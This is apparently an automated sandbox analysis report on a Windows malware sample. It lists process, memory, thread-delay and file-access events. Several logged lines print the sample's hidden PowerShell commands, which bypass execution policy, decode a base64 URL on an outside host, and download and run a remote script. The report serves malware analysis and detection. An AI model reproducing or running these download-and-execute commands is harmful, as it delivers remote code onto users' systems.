Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\87J30ulb4q.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeMemory allocated: 26F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeMemory allocated: 46F0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3414Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3732Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5299Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4472Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3322
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2145
Source: C:\Users\user\Desktop\87J30ulb4q.exe TID: 5220Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exe TID: 1000Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep count: 3414 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 3732 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -9223372036854770s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764Thread sleep count: 3322 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep count: 2145 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\87J30ulb4q.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: 87J30ulb4q.exe, 00000000.00000002.1336329887.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: powershell.exe, 00000008.00000002.1316997843.0000000007177000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1455748660.000001B76AD24000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1558187413.00000238D0630000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"
Source: C:\Users\user\Desktop\87J30ulb4q.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w hid -noni -ep Bypass -c "$w=New-Object Net.WebClient;$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aHR0cHM6Ly96amh5LmNvaW1icmF0cmF0YWRvcmVzLmNvbS9qa3FqY3B4cG5odGd4cg=='));IEX $w.DownloadString($u)"Jump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hid -noni -ep bypass -c "$w=new-object net.webclient;$u=[text.encoding]::utf8.getstring([convert]::frombase64string('ahr0chm6ly96amh5lmnvaw1icmf0cmf0ywrvcmvzlmnvbs91a2joc3h6y2p3cxlwaw=='));iex $w.downloadstring($u)"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hid -noni -ep bypass -c "$w=new-object net.webclient;$u=[text.encoding]::utf8.getstring([convert]::frombase64string('ahr0chm6ly96amh5lmnvaw1icmf0cmf0ywrvcmvzlmnvbs91a2joc3h6y2p3cxlwaw=='));iex $w.downloadstring($u)"
Source: C:\Users\user\Desktop\87J30ulb4q.exeQueries volume information: C:\Users\user\Desktop\87J30ulb4q.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\87J30ulb4q.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
